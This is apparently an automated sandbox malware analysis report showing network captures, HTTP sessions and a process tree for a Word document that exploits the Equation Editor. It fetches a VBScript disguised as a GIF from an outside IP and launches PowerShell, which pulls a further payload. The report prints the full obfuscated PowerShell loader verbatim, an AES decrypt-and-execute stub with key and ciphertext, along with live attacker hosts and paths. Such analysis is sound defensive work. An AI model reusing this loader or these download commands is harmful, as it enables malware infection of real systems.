    Jul 31, 2024 08:38:00.440654993 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.440660000 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.440705061 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.440705061 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.440754890 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.440803051 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.440853119 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.440862894 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.440903902 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.440932989 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.440980911 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.440983057 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.441030025 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.441031933 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.441081047 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.441083908 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.441131115 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.441251993 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.441301107 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.441315889 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.441349030 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.441350937 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.441397905 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.441397905 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.441447020 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.441447973 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.441493988 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.441497087 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.441544056 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.441545963 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.441598892 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.441600084 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.441648006 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.441651106 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.441698074 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.441699982 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.441747904 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.441981077 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.442028999 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.442047119 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.442079067 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.442090988 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.442127943 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.442131996 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.442183018 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.442183018 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.442233086 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.442234039 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.442281008 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.442284107 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.442329884 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.442332983 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.442379951 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.442383051 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.442428112 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.442433119 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.442476988 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.442478895 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.442523956 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.442526102 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.442574024 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.442574024 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.442624092 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.442625046 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.442673922 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.442776918 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.442826986 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.442847967 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.442874908 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.442876101 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.442924976 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.442925930 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.442972898 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.442975998 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.443022966 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:00.443027020 CEST8049161172.245.123.11192.168.2.22
    Jul 31, 2024 08:38:00.443078995 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:01.266659021 CEST4916180192.168.2.22172.245.123.11
    Jul 31, 2024 08:38:04.244699955 CEST4916280192.168.2.22198.46.176.133
    Jul 31, 2024 08:38:04.249752045 CEST8049162198.46.176.133192.168.2.22
    Jul 31, 2024 08:38:04.249851942 CEST4916280192.168.2.22198.46.176.133
    Jul 31, 2024 08:38:04.251045942 CEST4916280192.168.2.22198.46.176.133
    Jul 31, 2024 08:38:04.256360054 CEST8049162198.46.176.133192.168.2.22
    Jul 31, 2024 08:38:25.646744967 CEST8049162198.46.176.133192.168.2.22
    Jul 31, 2024 08:38:25.646821022 CEST4916280192.168.2.22198.46.176.133
    Jul 31, 2024 08:38:25.652468920 CEST4916280192.168.2.22198.46.176.133
    Jul 31, 2024 08:38:25.653069019 CEST4916380192.168.2.22198.46.176.133
    Jul 31, 2024 08:38:25.657238007 CEST8049162198.46.176.133192.168.2.22
    Jul 31, 2024 08:38:25.657931089 CEST8049163198.46.176.133192.168.2.22
    Jul 31, 2024 08:38:25.658004999 CEST4916380192.168.2.22198.46.176.133
    Jul 31, 2024 08:38:25.658106089 CEST4916380192.168.2.22198.46.176.133
    Jul 31, 2024 08:38:25.662837982 CEST8049163198.46.176.133192.168.2.22
    Jul 31, 2024 08:38:47.018635988 CEST8049163198.46.176.133192.168.2.22
    Jul 31, 2024 08:38:47.018726110 CEST4916380192.168.2.22198.46.176.133
    Jul 31, 2024 08:38:47.018774033 CEST4916380192.168.2.22198.46.176.133
    Jul 31, 2024 08:38:47.024869919 CEST8049163198.46.176.133192.168.2.22
    • 172.245.123.11
    • 198.46.176.133
    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    0192.168.2.2249161172.245.123.11802188C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    TimestampBytes transferredDirectionData
    Jul 31, 2024 08:37:59.508445978 CEST339OUTGET /46/seethemoononlinetoseebeautygirl.gIF HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 172.245.123.11
    Connection: Keep-Alive
    Jul 31, 2024 08:37:59.995101929 CEST1236INHTTP/1.1 200 OK
    Date: Wed, 31 Jul 2024 06:37:59 GMT
    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
    Last-Modified: Mon, 29 Jul 2024 05:46:01 GMT
    ETag: "66e5c-61e5c6047dcf6"
    Accept-Ranges: bytes
    Content-Length: 421468
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: image/gif
    Data Raw: ff fe 64 00 69 00 6d 00 20 00 74 00 68 00 65 00 72 00 6d 00 69 00 61 00 74 00 72 00 69 00 61 00 45 00 45 00 20 00 0d 00 0a 00 74 00 68 00 65 00 72 00 6d 00 69 00 61 00 74 00 72 00 69 00 61 00 45 00 20 00 3d 00 20 00 70 00 61 00 67 00 6f 00 64 00 65 00 69 00 72 00 6f 00 0d 00 0a 00 0d 00 0a 00 74 00 72 00 69 00 65 00 6e 00 6e 00 61 00 64 00 6f 00 28 00 22 00 4c 00 5f 00 48 00 65 00 6c 00 70 00 41 00 6c 00 69 00 61 00 73 00 5f 00 30 00 30 00 31 00 5f 00 30 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 22 00 29 00 20 00 26 00 20 00 74 00 68 00 65 00 72 00 6d 00 69 00 61 00 74 00 72 00 69 00 61 00 45 00 20 00 26 00 20 00 5f 00 0d 00 0a 00 74 00 72 00 69 00 65 00 6e 00 6e 00 61 00 64 00 6f 00 28 00 22 00 4c 00 5f 00 48 00 65 00 6c 00 70 00 41 00 6c 00 69 00 61 00 73 00 5f 00 30 00 30 00 32 00 5f 00 30 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 22 00 29 00 20 00 26 00 20 00 74 00 68 00 65 00 72 00 6d 00 69 00 61 00 74 00 72 00 69 00 61 00 45 00 20 00 26 00 20 00 5f 00 0d 00 0a 00 74 00 72 00 [TRUNCATED]
    Data Ascii: dim thermiatriaEE thermiatriaE = pagodeirotriennado("L_HelpAlias_001_0_Message") & thermiatriaE & _triennado("L_HelpAlias_002_0_Message") & thermiatriaE & _triennado("L_HelpAlias_003_0_Message") & thermiatriaE & _triennado("X_HelpAlias_004_0_Message") & thermiatriaE & _triennado("X_HelpAlias_005_0_Message") & thermiatriaE & _triennado("X_HelpAlias_006_0_Message") & thermiatriaE & _triennado("X_HelpAlias_007_0_Message") & thermiatriaE & _
    Jul 31, 2024 08:37:59.995199919 CEST1236INData Raw: 0a 00 74 00 72 00 69 00 65 00 6e 00 6e 00 61 00 64 00 6f 00 28 00 22 00 58 00 5f 00 48 00 65 00 6c 00 70 00 41 00 6c 00 69 00 61 00 73 00 5f 00 30 00 30 00 38 00 5f 00 30 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 22 00 29 00 20 00 26 00
    Data Ascii: triennado("X_HelpAlias_008_0_Message") & thermiatriaE & _triennado("X_HelpAlias_009_0_Message") & thermiatriaE & _tri
    Jul 31, 2024 08:37:59.995254040 CEST1236INData Raw: 20 00 70 00 61 00 67 00 6f 00 64 00 65 00 69 00 72 00 6f 00 0d 00 0a 00 0d 00 0a 00 74 00 72 00 69 00 65 00 6e 00 6e 00 61 00 64 00 6f 00 28 00 22 00 4c 00 5f 00 48 00 65 00 6c 00 70 00 41 00 6c 00 69 00 61 00 73 00 5f 00 30 00 30 00 31 00 5f 00
    Data Ascii: pagodeirotriennado("L_HelpAlias_001_0_Message") & ethermiatriaE & _triennado("L_HelpAlias_002_0_Message") & ethermi
    Jul 31, 2024 08:37:59.995317936 CEST1236INData Raw: 6e 00 6e 00 61 00 64 00 6f 00 28 00 22 00 4c 00 5f 00 48 00 65 00 6c 00 70 00 41 00 6c 00 69 00 61 00 73 00 5f 00 30 00 31 00 31 00 5f 00 30 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 22 00 29 00 20 00 26 00 20 00 65 00 74 00 68 00 65 00
    Data Ascii: nnado("L_HelpAlias_011_0_Message") & ethermiatriaE & _triennado("x_HelpAlias_012_0_Message") & ethermiatriaE & _trienn
    Jul 31, 2024 08:37:59.995367050 CEST896INData Raw: 29 00 20 00 26 00 20 00 6f 00 65 00 74 00 68 00 65 00 72 00 6d 00 69 00 61 00 74 00 72 00 69 00 61 00 45 00 20 00 26 00 20 00 5f 00 0d 00 0a 00 74 00 72 00 69 00 65 00 6e 00 6e 00 61 00 64 00 6f 00 28 00 22 00 58 00 5f 00 48 00 65 00 6c 00 70 00
    Data Ascii: ) & oethermiatriaE & _triennado("X_HelpAlias_004_0_Message") & oethermiatriaE & _triennado("X_HelpAlias_005_0_Message"
    Jul 31, 2024 08:37:59.995430946 CEST1236INData Raw: 5f 00 0d 00 0a 00 74 00 72 00 69 00 65 00 6e 00 6e 00 61 00 64 00 6f 00 28 00 22 00 4c 00 5f 00 48 00 65 00 6c 00 70 00 41 00 6c 00 69 00 61 00 73 00 5f 00 30 00 31 00 31 00 5f 00 30 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 22 00 29 00
    Data Ascii: _triennado("L_HelpAlias_011_0_Message") & oethermiatriaE & _triennado("x_HelpAlias_012_0_Message") & oethermiatriaE &
    Jul 31, 2024 08:37:59.995481968 CEST1236INData Raw: 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 22 00 4f 00 70 00 65 00 72 00 61 00 74 00 69 00 6f 00 6e 00 20 00 2d 00 20 00 22 00 0d 00 0a 00 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 63 00 6f 00 6e 00 73 00 74 00 20 00 4c 00 5f 00 4e 00 4f 00
    Data Ascii: = "Operation - "private const L_NOFILE_Message = "File does not exist: "private const L_PARZERO_Message
    Jul 31, 2024 08:37:59.995529890 CEST1236INData Raw: 65 00 20 00 6f 00 66 00 20 00 63 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 20 00 6c 00 69 00 6e 00 65 00 3b 00 20 00 77 00 69 00 6e 00 72 00 6d 00 2e 00 76 00 62 00 73 00 20 00 6e 00 6f 00 74 00 20 00 66 00 6f 00 75 00 6e 00 64 00 20 00 69 00 6e 00
    Data Ascii: e of command line; winrm.vbs not found in command string."private const L_ImproperUseOfQuotes_ErrorMessage = "A quoted p
    Jul 31, 2024 08:37:59.995599985 CEST672INData Raw: 49 00 4e 00 56 00 57 00 4d 00 49 00 55 00 52 00 49 00 31 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 22 00 49 00 6e 00 76 00 61 00 6c 00 69 00 64 00 20 00 57 00 4d 00 49 00 20 00 72 00 65 00
    Data Ascii: INVWMIURI1_Message = "Invalid WMI resource URI - no '/' found (at least 2 expected)"private const L_INVWMIURI2_Mes
    Jul 31, 2024 08:37:59.995655060 CEST1236INData Raw: 72 00 72 00 6f 00 72 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 20 00 3d 00 20 00 22 00 53 00 79 00 6e 00 74 00 61 00 78 00 20 00 45 00 72 00 72 00 6f 00 72 00 3a 00 20 00 69 00 6e 00 70 00 75 00 74 00 20 00 6d 00 75 00 73 00 74 00 20 00 62 00
    Data Ascii: rrorMessage = "Syntax Error: input must be of the form {KEY=""VALUE""[;KEY=""VALUE""]}"private const L_ARGNOVAL_Message
    Jul 31, 2024 08:38:00.000565052 CEST1236INData Raw: 2c 00 20 00 75 00 6e 00 66 00 6f 00 72 00 6d 00 61 00 74 00 74 00 65 00 64 00 2c 00 20 00 6d 00 65 00 73 00 73 00 61 00 67 00 65 00 3a 00 20 00 22 00 0d 00 0a 00 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 63 00 6f 00 6e 00 73 00 74 00 20 00
    Data Ascii: , unformatted, message: "private const L_PUT_PARAM_NOMATCH_Message = "Parameter name does not match any properties on re


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    1192.168.2.2249162198.46.176.133802160C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    TimestampBytes transferredDirectionData
    Jul 31, 2024 08:38:04.251045942 CEST79OUTGET /Upload/vbs.jpeg HTTP/1.1
    Host: 198.46.176.133
    Connection: Keep-Alive


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    2192.168.2.2249163198.46.176.133802160C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    TimestampBytes transferredDirectionData
    Jul 31, 2024 08:38:25.658106089 CEST79OUTGET /Upload/vbs.jpeg HTTP/1.1
    Host: 198.46.176.133
    Connection: Keep-Alive


    Click to jump to process

    Click to jump to process

    Click to dive into process behavior distribution

    Click to jump to process

    Target ID:0
    Start time:02:37:55
    Start date:31/07/2024
    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    Wow64 process (32bit):false
    Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
    Imagebase:0x13f440000
    File size:1'423'704 bytes
    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:2
    Start time:02:37:56
    Start date:31/07/2024
    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    Wow64 process (32bit):true
    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Imagebase:0x400000
    File size:543'304 bytes
    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:5
    Start time:02:38:00
    Start date:31/07/2024
    Path:C:\Windows\SysWOW64\wscript.exe
    Wow64 process (32bit):true
    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethemoononlinetoseebeautygir.vBS"
    Imagebase:0xec0000
    File size:141'824 bytes
    MD5 hash:979D74799EA6C8B8167869A68DF5204A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:6
    Start time:02:38:01
    Start date:31/07/2024
    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Wow64 process (32bit):true
    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIOwXrOWTIG5swItg7zFD9OyI4qwNW2DSA+q1jveygII0r57qf0cAj6Ce9uJCuE17ThTAaiQL4mofQp8uqjn3VIIKuKAd9GJB73yLEmkpBpYYcAEu88vSgVZa+wmnQQkoJtUCgSRaHp+XfVoLXIwKzRec6cDmhGQTBR7Ul9x0coyu8fZvCLEzPcJ9SC07ffDROhHuhBSqKcCMGVkwzBfDe4wI4QSXFR0cioaxw4x1d9OiaZdvRlQ7Tvm7FWSdWKap1gku8Ftkup76E06S7qo9mEmw3tQ8qUv7o4vz2iRXs0ziV2zz43kztQlVPWu56KrcwfHZt5wsMDlm6y/kjkAExZm4pluf7YEBU0A9z1FI7c07QhAF50PRC4b0P4vexv0bzhiLdo0tp8cckt4GwIeeQ3GfV2Zur7rf0fU7HcrFcz3hfoXleLocy+JFMy8qqSQjd/XosQ7Loo1qTTpHGyQFWgZS1pB46Tc9lrI4VOxvSWX/GyT8ubH3sMLCMJhQtdXw1sKyOIfbmmuyt6bekgtHwo9BT9lStdzFJJAp8PYU0AY5HRE2jyPLQWpUgsOnPjx2JPl/Sc0H2Tsg6gjn/cwA7+LtvKFZOYNFx30kb9Kkg120+UNFkmS3v8wisgRYUD+sxqWJCaoyPVzWfY584BmtA/Hr64HnPrrWPzoyj9tUJT8UVO3tT9eWx1M9YKsK8yTrjEf02EoWBw4WnUMRgKTnjfFYyMLsg2NnU1oxXqkoItIg2lwGDnOeJETOyEM7C6A+wuPv6mak+vAs/xJ/I0r6OiK7uPQ6AkeYeI5dzZuzjjQCCiZdkfko6mBk4niDu0TENks2a67LZ5FuJ4PbW/s3WrI//butcIDgnv8v1QVa1JGf41+WksQ3kQ4+9Xtf4DrV8TOY/yzMuoBGDp2Ur+Y3a2FqqH6NsjOn1LO8SRnwtJAKYUkfztnQCwdRqbH3gXLyXP4rQrJF639iKh0A6dOiDVbjFbrHrK3HKIv1d5DfX68wT1a2VFCyRRJ6xVCgM6V6abMhOKLbZ+iRrubeGx7Pm2FeTr5cAMo9rGs2qWm0eCHiFGB0Yk+D7U3tkSnZ7mguQUwDjGKV9B7Rpt9c1lK0N1SYOY8kxIH4yniwPWrtZ+l3+PjCwWT0pOlu/ZOV3DLSFAMsJg+fubDUUW6CB+/nfD6nY0TsrkIS8Ix3ddTanSmncNbv4w+qkUAGnU/k/ooziQQFAmfxWERdymw9x5Gz5l/oMs8qneLXH1MjFEGt8BDdzFgL40oSweew0uM1i4dzqqeZfQVqUjd7vet4Pm7LasIM+CNRyw2wAVLCpCorugD9TI6vWDEs0Wp/cxDN70mUygsZqxqn+LYilh1wVOfattE8/DMGxR5Edat/CxJndrUfDR9nAWVKhHOI/IYjBgfEpQik9qJZhHmSR22aVO600gw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
    Imagebase:0x270000
    File size:427'008 bytes
    MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Reset < >
      Memory Dump Source
      • Source File: 00000002.00000002.353863921.000000000028F000.00000004.00000020.00020000.00000000.sdmp, Offset: 0028F000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_28f000_EQNEDT32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 8753453581f01e91bc8f6c3b505197134f816eb45ae0e4824381e7e429f8eb0c
      • Instruction ID: ff0a4b7a1a83a9e62a1dc16f7fc97694757e161874c784766e77ede2a7969282
      • Opcode Fuzzy Hash: 8753453581f01e91bc8f6c3b505197134f816eb45ae0e4824381e7e429f8eb0c
      • Instruction Fuzzy Hash: 2CC1DD6245E3C19FD3178B30886A7917FB0AF27204F0E44EBD485CF5B3E269094ADB62
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.453307174.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_480000_powershell.jbxd
      Similarity
      • API ID:
      • String ID: @#ve$@#ve
      • API String ID: 0-1224764163
      • Opcode ID: 802302cb446b639df506badb0ee7931b12f7ce73a06fd0c2fcede162f5b34342
      • Instruction ID: 897742e71c10b36c5accc6648b36ab707e303632332663e72e8337efd82353f9
      • Opcode Fuzzy Hash: 802302cb446b639df506badb0ee7931b12f7ce73a06fd0c2fcede162f5b34342
      • Instruction Fuzzy Hash: 0461F231B043168BDB256A78941077FB7A2ABE1310F24887BD615DB381EB79DC4187A6
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.453307174.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_480000_powershell.jbxd
      Similarity
      • API ID:
      • String ID: 899
      • API String ID: 0-2226677896
      • Opcode ID: d5d5f03e46496b4dcf5d56bf1ab578ea3131df4f5367225e25ebc2ca8b66e46d
      • Instruction ID: 95ccde8f4ef9897f2a724ace6fded486c319cbfefcaf29fda32e7d8a149931dc
      • Opcode Fuzzy Hash: d5d5f03e46496b4dcf5d56bf1ab578ea3131df4f5367225e25ebc2ca8b66e46d
      • Instruction Fuzzy Hash: 3B919F70B042549FD7219B64C854B6EBBA6EF86310F18C4ABD909CF352CB76EC42C791
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.453307174.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_480000_powershell.jbxd
      Similarity
      • API ID:
      • String ID: 899
      • API String ID: 0-2226677896
      • Opcode ID: fb21bf377f12cdddf10275aa6b107b7a5a945d7f06554459b1edba9b113be1d8
      • Instruction ID: 20f88a2e59b4b36466c993fbd73bae1a2e2d44939487084e17be49ebc518f970
      • Opcode Fuzzy Hash: fb21bf377f12cdddf10275aa6b107b7a5a945d7f06554459b1edba9b113be1d8
      • Instruction Fuzzy Hash: 3F41C230A093849FC7229B60C850A5EBBB1AF86310F19C4DBD654DF3A3C7B99C45C762
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.453307174.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_480000_powershell.jbxd
      Similarity
      • API ID:
      • String ID: @#ve
      • API String ID: 0-3303420991
      • Opcode ID: 359d7f6de69a7b41ac01f3aa4638a30adce02ad0481cfad4123d0c71dd67bce1
      • Instruction ID: fa190d45920a38b7f370a9d88f404ed55efeb702d2ad586be2243f5c4e5774ab
      • Opcode Fuzzy Hash: 359d7f6de69a7b41ac01f3aa4638a30adce02ad0481cfad4123d0c71dd67bce1
      • Instruction Fuzzy Hash: 6031D334A042079BDF24AE24951077FB7A1BFE0310F24482BDA049B381DB7DCD41C7A9
      Memory Dump Source
      • Source File: 00000006.00000002.453235990.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_230000_powershell.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 564e5cee6483f4aac6fbb07c22b98ee7d419a778e2c7fe0969cb5fb676311fb9
      • Instruction ID: 65a0ceacecc71910a94affd666c116667e00535213f26fb17689181271eadfd5
      • Opcode Fuzzy Hash: 564e5cee6483f4aac6fbb07c22b98ee7d419a778e2c7fe0969cb5fb676311fb9
      • Instruction Fuzzy Hash: 1B221874A11219EFDB14CFA8D584A9DFBF2BF88310F258559E808AB351C771ED86CB90
      Memory Dump Source
      • Source File: 00000006.00000002.453235990.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_230000_powershell.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: f3f9273f5fd2c0984b0dc0f64db7c33ff7599e8188c1132e9576efb91e4194ca
      • Instruction ID: 2d0fc07cb4111bd365a962bc26c2dfcee81377d3f8f20641c96e96eb38bf9820
      • Opcode Fuzzy Hash: f3f9273f5fd2c0984b0dc0f64db7c33ff7599e8188c1132e9576efb91e4194ca
      • Instruction Fuzzy Hash: D2B13874A10219DFDB04CFA8C484AADFBB2FF88310F248559E809AB355C771ED92CB90
      Memory Dump Source
      • Source File: 00000006.00000002.453235990.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
      Joe Sandbox IDA Plugin
